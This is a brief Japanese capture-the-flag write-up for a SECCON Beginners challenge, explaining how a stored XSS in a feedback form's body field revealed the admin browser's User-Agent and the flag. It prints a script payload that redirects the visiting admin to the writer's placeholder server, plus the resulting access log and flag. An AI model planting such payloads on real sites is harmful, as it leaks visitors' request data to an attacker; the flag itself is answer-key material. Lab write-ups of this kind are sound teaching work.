問題文

ビギナーズカンパニーは皆様からのご意見をお待ちしています。 お問合わせの回答には特別なブラウザを使用しており、このブラウザの User-Agent が分かった方には特別に得点を差し上げます :-) http://gyc.chall.beginners.seccon.jp

writeup

右上の新規投稿ボタンを押下すると、「タイトル」と「本文」を入力して投稿可能な画面へ遷移する。

「本文」項目にXSSの脆弱性がある。 <script>location.href="http://<myserver>/1g993rc1"</script> を入力して投稿する。

管理者からアクセスが来た。

153.127.201.157 - - [27/May/2018:10:59:15 +0900] "GET / HTTP/1.1" 200 288 "http://nginx/posts/2a15c020e11025c2d3d78c66f683f2bb9ca9302c" "ctf4b{h4v3_fun_w17h_4_51mpl3_cr055_5173_5cr1p71n6}"

フラグゲット。
ctf4b{h4v3_fun_w17h_4_51mpl3_cr055_5173_5cr1p71n6}